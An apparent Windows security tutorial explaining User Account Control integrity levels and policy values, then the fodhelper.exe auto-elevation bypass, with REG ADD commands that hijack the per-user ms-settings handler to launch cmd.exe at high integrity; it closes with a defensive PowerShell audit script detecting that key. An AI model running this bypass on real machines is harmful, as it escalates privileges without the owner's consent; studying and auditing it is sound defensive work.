User Account Control (UAC) is an access control system that forces applications and tasks to run in the context of a non-administrative account until an administrator authorizes elevated access.
UAC was first introduced in Windows Vista and attracted complaints from users due to the frequency and annoyance of the popups, which led Microsoft to introduce some relaxations.
Mandatory Levels
There are three types of Mandatory Level:

```
whoami /all

GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes
==================================== ================ ============ ==================================================
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users         Alias            S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE             Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication     Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Low Mandatory Level  Unknown SID type S-1-16-4096  Mandatory group, Enabled by default, Enabled group
```
- Low Mandatory Level: a process such as Internet Explorer has almost no permissions and cannot write to most directories, yet IE still needs somewhere to write its cache. A Low Mandatory Level process can therefore only write data to the following path:
  `C:\Users\Victim\AppData\LocalLow`
- Medium Mandatory Level: the permissions of a normal user.
- High Mandatory Level: the permissions of NT AUTHORITY\SYSTEM.
UAC Bypass
Some of Windows' own trusted, signed applications are able to "auto-elevate" without consent under certain conditions.
The default UAC configuration is Prompt for consent for non-Windows binaries, but it can also be set to Prompt for credentials, Prompt for consent, or Elevate without prompting.
We can check the UAC configuration with PowerShell:

```powershell
$path = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
$filter="ConsentPromptBehaviorAdmin|ConsentPromptBehaviorUser|EnableInstallerDetection|EnableLUA|EnableVirtualization|PromptOnSecureDesktop|ValidateAdminCodeSignatures|FilterAdministratorToken"
(Get-ItemProperty $path).psobject.properties | where {$_.name -match $filter} | select name,value
```

```
Name                        Value
----                        -----
ConsentPromptBehaviorAdmin  5
ConsentPromptBehaviorUser   3
EnableInstallerDetection    1
EnableLUA                   1
EnableVirtualization        1
PromptOnSecureDesktop       1
ValidateAdminCodeSignatures 0
```
We are interested in the ConsentPromptBehaviorAdmin parameter.

| Value | Meaning |
|---|---|
| 0 | Elevate without prompting |
| 1 | Prompt for credentials (Secure Desktop) |
| 2 | Prompt for consent (Secure Desktop) |
| 3 | Prompt for credentials |
| 4 | Prompt for consent |
| 5 (Default) | Prompt for consent for non-Windows binaries |
A UAC bypass is a technique by which an application can go from Medium Integrity to High Integrity without prompting for consent.
fodhelper.exe
fodhelper.exe is a Microsoft support application responsible for managing language changes in the operating system. This binary runs as high integrity on Windows 10.
With sigcheck.exe from Sysinternals it is possible to inspect the application manifest:

```
sigcheck.exe -a -m C:\Windows\System32\fodhelper.exe
```
Note: look for `requestedExecutionLevel` set to `requireAdministrator` and `autoElevate` set to `true`.
First we need to add some registry keys with REG:

```
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f
```
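The PowerShell check of the policy keys above and the per-user `ms-settings` handler the technique registers give a defender two things to audit. The following script is an added example, not code from the original post; the function and variable names are my own, while the registry paths, value names and the value meanings are taken from the page.

```powershell
# Added example (not from the original post): audit the UAC policy values shown above and
# check whether a per-user ms-settings handler (the key the fodhelper technique uses) exists.
function Get-UacAudit {
    $policy = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $hijack = 'HKCU:\Software\Classes\ms-settings\Shell\Open\command'
    # Meaning of ConsentPromptBehaviorAdmin, as tabulated above
    $meaning = @{
        0 = 'Elevate without prompting'
        1 = 'Prompt for credentials (Secure Desktop)'
        2 = 'Prompt for consent (Secure Desktop)'
        3 = 'Prompt for credentials'
        4 = 'Prompt for consent'
        5 = 'Prompt for consent for non-Windows binaries (default)'
    }
    $p = Get-ItemProperty -Path $policy
    # A missing value means the built-in default (5) applies
    $admin = if ($null -eq $p.ConsentPromptBehaviorAdmin) { 5 } else { [int]$p.ConsentPromptBehaviorAdmin }
    $findings = New-Object System.Collections.Generic.List[string]

    if ($p.EnableLUA -eq 0) {
        $findings.Add('EnableLUA=0: UAC is switched off; admin processes start at High integrity.')
    }
    if ($admin -eq 0) {
        $findings.Add('ConsentPromptBehaviorAdmin=0: administrators elevate without any prompt.')
    }
    if ($p.PromptOnSecureDesktop -eq 0) {
        $findings.Add('PromptOnSecureDesktop=0: elevation prompts are not isolated on the secure desktop.')
    }
    if ($admin -eq 5) {
        # At the default, Windows binaries whose manifest carries autoElevate=true skip the
        # prompt; "Always notify" (value 2 on the secure desktop) prompts for those as well.
        $findings.Add('ConsentPromptBehaviorAdmin=5: auto-elevating Windows binaries do not prompt.')
    }
    if (Test-Path -Path $hijack) {
        # Under HKCU this key is writable at Medium integrity, so its presence is worth investigating
        $h = Get-ItemProperty -Path $hijack
        $findings.Add("Per-user ms-settings handler present: (default)='$($h.'(default)')' DelegateExecute='$($h.DelegateExecute)'")
    }
    [pscustomobject]@{
        ConsentPromptBehaviorAdmin = $admin
        Meaning                    = $meaning[$admin]
        Findings                   = $findings
    }
}

Get-UacAudit | Format-List
```

Run it from an ordinary (Medium integrity) session; reading the HKLM policy key and the HKCU handler key does not require elevation.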